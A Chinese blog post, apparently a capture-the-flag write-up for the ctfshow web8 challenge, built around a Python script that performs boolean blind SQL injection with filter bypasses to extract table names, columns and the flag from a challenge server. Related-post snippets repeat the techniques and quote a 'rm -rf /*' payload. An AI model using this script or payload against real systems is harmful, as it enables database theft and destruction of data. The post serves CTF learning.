ctfshow web8 wp

最新推荐文章于 2025-01-19 17:26:20 发布
原创 最新推荐文章于 2025-01-19 17:26:20 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种SQL注入技巧——报错注入,通过分析第八题的特性,利用Python脚本进行自动化爆破,逐步猜出数据库中的敏感信息,如表名、字段名及具体数据。
部署运行你感兴趣的模型镜像

第八题看起来和第七题十分相似,但是尝试过后会发现第八题的有了一些关键词过滤,所以union拼接注入不可行,但是我们又看到了他会返回报错信息所以此时想到报错注入。
这里是我在网上抄的代码,原理就是一个一个字符去猜,直到猜出所有字符

import requests
s=requests.session()
url='http://124.156.121.112:28045/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

您可能感兴趣的与本文相关的镜像

Python3.10

Python3.10

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

CTF show WEB7-8
羽的博客
02-15 4126
点开其中一篇文章,发现可能存在的注入点,输入单引号正常显示,输入双引号无回显,猜测为字符型单引号注入,其中空格被过滤。 使用sleep函数测试注入点id=-1'or/**/sleep(3)# 发现存在延时证明存在注入点,通过有无文章来判断字符。接下来进行sql注入。 1.爆库名(web7) 当输入为id=-1'/**/or/**/ascii(substr(database(),1,1))=119#...
ctfshow WEB web8
最新发布
weixin_68416970的博客
03-30 701
ctfshow WEB web8
ctfshow-萌新-web8( 从删库到跑路)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web8关,这一关考察的是一个梗??? 进去页面以后展示了部分源码,提交一个参数flag,与文件中的key相同即可夺旗 这一关的线索就在进入关卡的弹窗中,阿呆熟悉的一顿操作,去了埃塞尔比亚 是非洲的一个国家,这是删库跑路的节奏啊,payload如下 ?flag=rm -rf /* rm指令 rm -rf /* 是Linux的一条指令,/*代表根目录下所有路径,作用是删除根目录下所有文件,也就是删除系统中的所有文件 格式:rm ...
ctfshow-WEB-web8
热门推荐
wangyuxiang946的博客
09-05 2万+
ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字, 1. 过滤空格, 可以使用括号() 或者注释/**/ 绕过 2. 过滤and, 可以使用or替代 3. 过滤union, 可以用盲注替代联合注入 4. 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替 首先确定注入点, 输入...
ctfshow web8
qq_45694932的博客
09-13 1119
整形注入 判断是字符型还是整形注入 1.检查是否存在注入 2.空格过滤用/**/替换 3. ,过滤: 将limit 0,1样式改为limit 1 offset 0。 将substr(string,1,1)改为substr(string from 1 for 1)。 id=-1 /**/or /**/1=1 返回正确 id=-1/**/or/**/1=2 错误没有回显应该是盲注 说明是整形注入 这里过滤了and import requests url='http://e2312a42-19a7-4415-
CTFShow-Web篇详细wp(持续更新中ing)_ctfshow web wp
2401_84297944的博客
04-28 674
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料。
ctfshow web入门 wp web1--web11
2301_81040377的博客
03-30 1067
生产环境下使用vim/vi修改文件时,发生意外时会产生一个后缀为.swp的隐藏文件,第二次意外退出的时候生成的备份文件后缀为:.swo;先说一下我的心路历程我打算快乐的开始web的时候,结果打不开靶机,一看VIP一会几十就能搞定,结果没想到599,哦豁,我太痛了,我必须好好卷,不然对不起我这599。php源码这个相当于废话因为我做了几十道题了基本源码都是php(为此专门学了php的 相关知识)靶机没了,我去找了几个随便的网站进行查询都没有结果,去查了一下。拿去提交,vocal,不对,那么在网页里面吧应该。
ctfshow web入门 wp web7&&web8 web11--web20
2301_81040377的博客
03-31 360
得到用户名admin 实际上一般都是这个,密码在哪里呢(这个界面找了半天没找到)我昨天做了很久就是扫不出来DNS原来是个动态的所以就没了只能按照提示交flag了。接上文,web7和web8我发现了一个比较官方的做法(不吃知识点)就是后台扫描。我用kali的dirb扫描不出来,于是用的dirsearch。url后缀名添加/tz.php 版本是雅黑PHP探针。抓包我发现他给我密码弄长了,很明显把我密码改了。我就说hackbar怎么用不了原来把我密码改了。现居西安哈哈难绷居然这么细节。
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1093
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
ctfshow-web8
aarong的博客
12-24 1907
如图跟上题一样都是sql注入类型的题目: 根据上题过滤空格的经验,这一题也是一样过滤了空格,并且and、和union select都过滤了,那么只能考虑运用其他方法来注入了: 过滤空格:可以使用/**/和%a0绕过 过滤联合查询语句:可以使用盲注替代联合注入 过滤逗号,:可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用 substr(database() from 1 for 1)来代替 过滤and:可以使用or 从这篇博客得到了注入代码: ...
CTF SHOW WEB8
qq_53319483的博客
04-21 2256
CTF SHOW WEB8
ctfshow-WEB-web8_ctfshow web8
2501_90325913的博客
01-19 644
ctf.showWEB模块第8关是一个SQL注入漏洞,注入点是数值型,注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字,接下来进行脱库,由于盲注脱库比较复杂,此处我们构造Python脚本进行自动化脱库,注意payload中的字符串不要换行,否则可能会出问题。由于SQL恒成立,数据库将查询出表中的所有内容,并返回到前端展示。由于SQL恒不成立,数据库查询不到任何数据,从而导致页面空显示。由以上返回结果可知,该页面存在SQL注入,注入点为。
CTF-show WEB入门--web8
m0_73912575的博客
12-30 978
CTF-show WEB入门--web8
刷题之旅第28站,CTFshow web8
cc菜的一批
02-17 2906
感谢ctf show平台提供题目 打开网站,入眼看起来像sql注入。 index.php?id=0/**/or/**/1=1# 网站过滤了union 常规注入是不行了,那么进行布尔型盲注。 题目对逗号进行了过滤,那么也有绕过姿势! ' and ascii(substr((select database()),1,1))=xx # 这样的话写个脚本很容易跑出来了,过滤逗号之后可以变成这样 '...
CTF.show:web7-web8
qq_46230755的博客
01-15 1032
web7 这题是一题盲注题,对url进行盲注测试 从网上找到的师傅的爆表名脚本 import requests url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/" def db(url): # 爆库名 for i in range(1, 5): for j in range(32, 128): u = "or/**/ascii(s
CTFShow Web7&Web8
qq_62566956的博客
03-29 481
版本控制很重要,但不要部署到生产环境更重要。
ctf.show_web8(脚本问题)
qq_62046696的博客
06-02 2184
这道题是我第一次用py脚本做题,收获真的很大,虽然过程非常艰难第一步判断注入点类型 由于SQL恒不成立, 数据库查询不到任何数据, 从而导致页面空显示所以判断这是数值型注入从这可以看出过滤了and 接下来进行脱库, 由于盲注脱库比较复杂, 此处我们构造Python脚本进行自动化脱库, 注意payload中的字符串不要换行, 否则可能会出问题 查询了数据库名 查询表名,猜测在flag表中 查询字段名这里有个要点, table_name=0x666C6167这里是表名等于flag,flag
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值